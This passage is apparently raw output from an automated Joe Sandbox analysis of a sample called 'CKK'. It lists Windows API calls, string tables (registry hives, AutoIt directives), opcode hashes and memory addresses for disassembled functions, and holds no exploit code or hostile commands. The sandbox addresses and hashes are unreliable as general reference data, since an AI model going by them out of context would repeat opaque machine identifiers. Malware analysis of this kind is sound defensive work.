                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                              • String ID:
                                                                                              • API String ID: 4175595110-0
                                                                                              • Opcode ID: a0d7603b2fa19f2f6e852888267371334d42463c607be7493c64eb0b8438e5a3
                                                                                              • Instruction ID: 0fa8e594cc503b02b728a2449032dca3d8d2499f7f1b7a749c6976828ba638bd
                                                                                              • Opcode Fuzzy Hash: a0d7603b2fa19f2f6e852888267371334d42463c607be7493c64eb0b8438e5a3
                                                                                              • Instruction Fuzzy Hash: 9071597290021AABDF20DFA4DD49FAEBBB8BF04752F144215F919E6191D7319A0ACF70
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7C4BD
                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A8CC08,00000000,?,00000000,?,?), ref: 00A7C544
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A7C5A4
                                                                                              • _wcslen.LIBCMT ref: 00A7C5F4
                                                                                              • _wcslen.LIBCMT ref: 00A7C66F
                                                                                              • RegSetValueExW.ADVAPI32 ref: 00A7C6B2
                                                                                              • RegSetValueExW.ADVAPI32 ref: 00A7C7C1
                                                                                              • RegSetValueExW.ADVAPI32 ref: 00A7C84D
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A7C881
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A7C88E
                                                                                              • RegSetValueExW.ADVAPI32 ref: 00A7C960
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                              • API String ID: 9721498-966354055
                                                                                              • Opcode ID: de46082ca99dde90563614b700edcde67a8b87e34584c5eb5ae8191571e5e73b
                                                                                              • Instruction ID: 1844e8b78c6b0ece6c14be5c52ccb09250ea6fda4b7b2f58da1f1ca2430998e3
                                                                                              • Opcode Fuzzy Hash: de46082ca99dde90563614b700edcde67a8b87e34584c5eb5ae8191571e5e73b
                                                                                              • Instruction Fuzzy Hash: CF125675604205AFD714DF24C881B2AB7E5EF88724F04C89DF98A9B3A2DB71ED45CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A809C6
                                                                                              • _wcslen.LIBCMT ref: 00A80A01
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A80A54
                                                                                              • _wcslen.LIBCMT ref: 00A80A8A
                                                                                              • _wcslen.LIBCMT ref: 00A80B06
                                                                                              • _wcslen.LIBCMT ref: 00A80B81
                                                                                                • Part of subcall function 00A0F9F2: _wcslen.LIBCMT ref: 00A0F9FD
                                                                                                • Part of subcall function 00A52BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A52BFA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                              • API String ID: 1103490817-4258414348
                                                                                              • Opcode ID: ada0f44ffd58f632361cffa25b07d9975befe0112c2c2320945a879204c5d9ee
                                                                                              • Instruction ID: 8c540bbf0da261f4c6ee2bda43b44bbb09cdee46915f18f84719cfe90bde54c8
                                                                                              • Opcode Fuzzy Hash: ada0f44ffd58f632361cffa25b07d9975befe0112c2c2320945a879204c5d9ee
                                                                                              • Instruction Fuzzy Hash: 08E189312083019FCB54EF24C550E6AB7E1BF98354B15895DF89AAB3A2DB31ED49CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                              • API String ID: 1256254125-909552448
                                                                                              • Opcode ID: b18c3fe1b54462086c45e6598ce257f1fc9e73af3e66bf558489b2a6dc46e73f
                                                                                              • Instruction ID: cc9dabeb777de149182942d49d05656410b0810c2ef072c991195b8f9cb3af89
                                                                                              • Opcode Fuzzy Hash: b18c3fe1b54462086c45e6598ce257f1fc9e73af3e66bf558489b2a6dc46e73f
                                                                                              • Instruction Fuzzy Hash: 9B71E73260012A8BCB20DF7CCD515FF33A6ABA47B4B15C52CF85DA7285EA71CD858390
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00A8835A
                                                                                              • _wcslen.LIBCMT ref: 00A8836E
                                                                                              • _wcslen.LIBCMT ref: 00A88391
                                                                                              • _wcslen.LIBCMT ref: 00A883B4
                                                                                              • LoadImageW.USER32 ref: 00A883F2
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00A85BF2), ref: 00A8844E
                                                                                              • LoadImageW.USER32 ref: 00A88487
                                                                                              • LoadImageW.USER32 ref: 00A884CA
                                                                                              • LoadImageW.USER32 ref: 00A88501
                                                                                              • FreeLibrary.KERNEL32(?), ref: 00A8850D
                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A8851D
                                                                                              • DestroyIcon.USER32(?,?,?,?,?,00A85BF2), ref: 00A8852C
                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A88549
                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A88555
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                              • String ID: .dll$.exe$.icl
                                                                                              • API String ID: 799131459-1154884017
                                                                                              • Opcode ID: 99ae54a337d4f210c246e20a28619b36ca97f3148999fa4470edc801dc94222c
                                                                                              • Instruction ID: 44f402320ab4d750dd14d3b4440801949da180f36fd0b7e81839396ed425e309
                                                                                              • Opcode Fuzzy Hash: 99ae54a337d4f210c246e20a28619b36ca97f3148999fa4470edc801dc94222c
                                                                                              • Instruction Fuzzy Hash: 8F61C072540219BAEB14EF64CC45BFE77ACBF08B21F504609F915D60D1DF78A980CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                              • API String ID: 0-1645009161
                                                                                              • Opcode ID: 4aad0859f7eba3aaa0d0da165332331f865128d63e2a6bf5a5bb2fdc68d32667
                                                                                              • Instruction ID: 547b92154dfde0f752b5dd1b886b7b5cd5feb580c60a6a7a49ad9d69aaaf52f2
                                                                                              • Opcode Fuzzy Hash: 4aad0859f7eba3aaa0d0da165332331f865128d63e2a6bf5a5bb2fdc68d32667
                                                                                              • Instruction Fuzzy Hash: FC81D171A04209BBDB20BFA4DD42FFEB7A8BF55340F044424FA05AA1D6EB74DA51C7A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadIconW.USER32 ref: 00A55A2E
                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A55A40
                                                                                              • SetWindowTextW.USER32 ref: 00A55A57
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00A55A6C
                                                                                              • SetWindowTextW.USER32 ref: 00A55A72
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00A55A82
                                                                                              • SetWindowTextW.USER32 ref: 00A55A88
                                                                                              • SendDlgItemMessageW.USER32 ref: 00A55AA9
                                                                                              • SendDlgItemMessageW.USER32 ref: 00A55AC3
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A55ACC
                                                                                              • _wcslen.LIBCMT ref: 00A55B33
                                                                                              • SetWindowTextW.USER32 ref: 00A55B6F
                                                                                              • GetDesktopWindow.USER32 ref: 00A55B75
                                                                                              • GetWindowRect.USER32(00000000), ref: 00A55B7C
                                                                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00A55BD3
                                                                                              • GetClientRect.USER32 ref: 00A55BE0
                                                                                              • PostMessageW.USER32 ref: 00A55C05
                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A55C2F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 895679908-0
                                                                                              • Opcode ID: 6d9b0de7a69b3307c1fd791556f0de37e8624bbf82954af039f764771bd42651
                                                                                              • Instruction ID: 2e6375c28767446ce241e942cc551dcf2c379b036ff2a5658e401e41a38434b9
                                                                                              • Opcode Fuzzy Hash: 6d9b0de7a69b3307c1fd791556f0de37e8624bbf82954af039f764771bd42651
                                                                                              • Instruction Fuzzy Hash: 9F716D31900B05AFDB20DFB8CE99A6EBBF5FF48715F104528E542A25A0E775E948CF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00A100C6
                                                                                                • Part of subcall function 00A100ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00AC070C,00000FA0,E1103337,?,?,?,?,00A323B3,000000FF), ref: 00A1011C
                                                                                                • Part of subcall function 00A100ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00A323B3,000000FF), ref: 00A10127
                                                                                                • Part of subcall function 00A100ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00A323B3,000000FF), ref: 00A10138
                                                                                                • Part of subcall function 00A100ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable,?,?,?,?,00A323B3,000000FF), ref: 00A1014E
                                                                                                • Part of subcall function 00A100ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS,?,?,?,?,00A323B3,000000FF), ref: 00A1015C
                                                                                                • Part of subcall function 00A100ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable,?,?,?,?,00A323B3,000000FF), ref: 00A1016A
                                                                                                • Part of subcall function 00A100ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A10195
                                                                                                • Part of subcall function 00A100ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A101A0
                                                                                              • ___scrt_fastfail.LIBCMT ref: 00A100E7
                                                                                                • Part of subcall function 00A100A3: __onexit.LIBCMT ref: 00A100A9
                                                                                              Strings
                                                                                              • WakeAllConditionVariable, xrefs: 00A10162
                                                                                              • InitializeConditionVariable, xrefs: 00A10148
                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A10122
                                                                                              • SleepConditionVariableCS, xrefs: 00A10154
                                                                                              • kernel32.dll, xrefs: 00A10133
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                              • API String ID: 66158676-1714406822
                                                                                              • Opcode ID: a5c42d33a1981f0ef58d34b1323e8ba92f0cf3151eb8fa163fcbccab47b552a4
                                                                                              • Instruction ID: e2d689090a389fdaa91655d9ad12858777dd0de0d88915907a3b54612e992d26
                                                                                              • Opcode Fuzzy Hash: a5c42d33a1981f0ef58d34b1323e8ba92f0cf3151eb8fa163fcbccab47b552a4
                                                                                              • Instruction Fuzzy Hash: A821F932644711FFE710ABE4BD49FAA7394FB04F61F150639F901E6691DBF898818BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                              • API String ID: 176396367-1603158881
                                                                                              • Opcode ID: 507832d08daec4f98d42e5dcf9569403af74a1c316bf52214add11e89360aa66
                                                                                              • Instruction ID: 2e933f398d2b878f6dfe51e4760cd03a8d0891068bb6c8c8fc62cefa6aba9f8b
                                                                                              • Opcode Fuzzy Hash: 507832d08daec4f98d42e5dcf9569403af74a1c316bf52214add11e89360aa66
                                                                                              • Instruction Fuzzy Hash: 1AE1B333A00516AFCF149FB8C4517EDBBB4BF94791F648129E856E7240EB30AE89C790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$BuffCharDriveLowerType
                                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                              • API String ID: 2055661098-1000479233
                                                                                              • Opcode ID: 04a512b238188d4a014075895a983959581455e44333830815d176683c69401f
                                                                                              • Instruction ID: db500e45b6acb371dac11b5c4753f40151bb619ae7aff5ff2b56bf78f8834dff
                                                                                              • Opcode Fuzzy Hash: 04a512b238188d4a014075895a983959581455e44333830815d176683c69401f
                                                                                              • Instruction Fuzzy Hash: 04B1DE756083029FC710EF28C890A7AB7F5AFA9760F50491DF5A6C7291E730DC44CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00A7B198
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A7B1B0
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A7B1D4
                                                                                              • _wcslen.LIBCMT ref: 00A7B200
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A7B214
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A7B236
                                                                                              • _wcslen.LIBCMT ref: 00A7B332
                                                                                                • Part of subcall function 00A605A7: GetStdHandle.KERNEL32(000000F6), ref: 00A605C6
                                                                                              • _wcslen.LIBCMT ref: 00A7B34B
                                                                                              • _wcslen.LIBCMT ref: 00A7B366
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A7B3B6
                                                                                              • GetLastError.KERNEL32(00000000), ref: 00A7B407
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A7B439
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A7B44A
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A7B45C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A7B46E
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A7B4E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                              • String ID:
                                                                                              • API String ID: 2178637699-0
                                                                                              • Opcode ID: f54e138d3f16487a6d6a59ba9e75d20209b78ab8c2e0fd9d0a5f5f917aa56f4d
                                                                                              • Instruction ID: 892862f65a84b71fe9ae524da82182b8aadd72ebd94273f5cf9242028bc11e1e
                                                                                              • Opcode Fuzzy Hash: f54e138d3f16487a6d6a59ba9e75d20209b78ab8c2e0fd9d0a5f5f917aa56f4d
                                                                                              • Instruction Fuzzy Hash: 4FF1AC716183049FCB24EF24C891B6EBBE5AF84314F14C55DF9999B2A2DB30EC45CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetMenuItemCount.USER32(00AC1990), ref: 00A32F8D
                                                                                              • GetMenuItemCount.USER32(00AC1990), ref: 00A3303D
                                                                                              • GetCursorPos.USER32(?), ref: 00A33081
                                                                                              • SetForegroundWindow.USER32(00000000), ref: 00A3308A
                                                                                              • TrackPopupMenuEx.USER32 ref: 00A3309D
                                                                                              • PostMessageW.USER32 ref: 00A330A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                              • String ID: 0
                                                                                              • API String ID: 36266755-4108050209
                                                                                              • Opcode ID: a15797ce93e6ddac0ef14af24e4afd438456f9eecfc95e7303547ff3c1f62dd1
                                                                                              • Instruction ID: 81455d5fca8a77ea5cc761fbed6dd7a6165d40b3aa4c39086a41053e2e616a0e
                                                                                              • Opcode Fuzzy Hash: a15797ce93e6ddac0ef14af24e4afd438456f9eecfc95e7303547ff3c1f62dd1
                                                                                              • Instruction Fuzzy Hash: 36712971644209BFEB25DF64CC49FAABF64FF05364F204216F6246A1E1C7B5AD20CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DestroyWindow.USER32 ref: 00A86DEB
                                                                                                • Part of subcall function 009F6B57: _wcslen.LIBCMT ref: 009F6B6A
                                                                                              • CreateWindowExW.USER32 ref: 00A86E5F
                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A86E81
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A86E94
                                                                                              • DestroyWindow.USER32 ref: 00A86EB5
                                                                                              • CreateWindowExW.USER32 ref: 00A86EE4
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A86EFD
                                                                                              • GetDesktopWindow.USER32 ref: 00A86F16
                                                                                              • GetWindowRect.USER32(00000000), ref: 00A86F1D
                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A86F35
                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A86F4D
                                                                                                • Part of subcall function 00A09944: GetWindowLongW.USER32(?,000000EB), ref: 00A09952
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                              • String ID: 0$tooltips_class32
                                                                                              • API String ID: 2429346358-3619404913
                                                                                              • Opcode ID: 9c8fc0847b1333fb8b3ac409a7f0367374d5fdd5c2b6ca658ef886f7b624654e
                                                                                              • Instruction ID: edc82cb30e8528bd4af2d07629c2526f20e4ff0240fb8308836d12ae09a6265a
                                                                                              • Opcode Fuzzy Hash: 9c8fc0847b1333fb8b3ac409a7f0367374d5fdd5c2b6ca658ef886f7b624654e
                                                                                              • Instruction Fuzzy Hash: AF714874104244AFEB21DF58D848FAABBE9FB89314F44042DFA9987261D774ED06DF21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
